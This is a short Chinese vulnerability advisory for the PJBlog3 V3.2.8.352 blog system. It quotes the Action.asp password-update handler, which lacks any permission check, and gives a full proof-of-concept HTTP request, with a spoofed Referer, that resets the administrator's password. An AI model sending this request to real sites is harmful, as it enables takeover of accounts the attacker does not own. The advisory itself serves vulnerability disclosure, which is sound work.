发布日期：2011-06.19

发布作者：佚名

影响版本：PJBlog3 V3.2.8.352

漏洞类型：设计错误

漏洞描述：PJBlog一套开源免费的中文个人博客系统程序，采用asp+Access的技术，具有相当高的运作效能以及更新率，也支持目前Blog所使用的新技术

在文件Action.asp中：

复制代码代码如下:

ElseIf Request.QueryString("action") = "updatepassto" Then //第307行

If ChkPost() Then

Dim e_Pass, e_RePass, e_ID, e_Rs, e_hash, d_pass

e_ID = CheckStr(UnEscape(Request.QueryString("id")))

e_Pass = CheckStr(UnEscape(Request.QueryString("pass")))

e_RePass = CheckStr(UnEscape(Request.QueryString("repass")))

Set e_Rs = Server.CreateObject("Adodb.Recordset")

e_Rs.open "Select * From [blog_Member] Where [mem_ID]="&e_ID, Conn, 1, 3

e_hash = e_Rs("mem_salt")

d_pass = SHA1(e_Pass&e_hash)

e_Rs("mem_Password") = d_pass

e_Rs.update

e_Rs.Close

Set e_Rs = nothing

response.Write("1")

Else

response.write lang.Err.info(999)

End If

程序在修改用户的密码时，没有对用户的合法权限做验证，导致攻击者可以修改任意用户的密码。 应该先判断用户权限

测试方法:

复制代码代码如下:

//需修改Referer值通过程序检测

GET /action.asp?action=updatepassto&id=1&pass=123456&repass=test HTTP/1.1

Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: http://127.0.0.1/test.htm

Accept-Language: zh-cn

UA-CPU: x86

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler 4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)

Host: 127.0.0.1

Connection: Keep-Alive

Cookie: PJBlog3Setting=ViewType=normal; PJBlog3=memRight=000000110000&memHashKey=&memName=&DisValidate=False&memLastpost=2009%2D11%2D08+11%3A18%3A27&exp=2010%2D11%2D8&Guest=%7Brecord%3Atrue%2Cusername%3A%27test%27%2Cuseremail%3A%27ww%40126%2Ecom%27%2Cuserwebsite%3A%27http%3A%2F%2Fwww%2Ebaidu%2Ecom%2Findex%3F%26lt%3Bfff%26gt%3B%27%7D; ASPSESSIONIDASDSSADD=DAMNKLBDKADFCKOGKEJOKJPP; ASPSESSIONIDCQCQTBCD=MOJFLCCDBICHALBBGGMMENML

（测试结果：成功修改管理密码）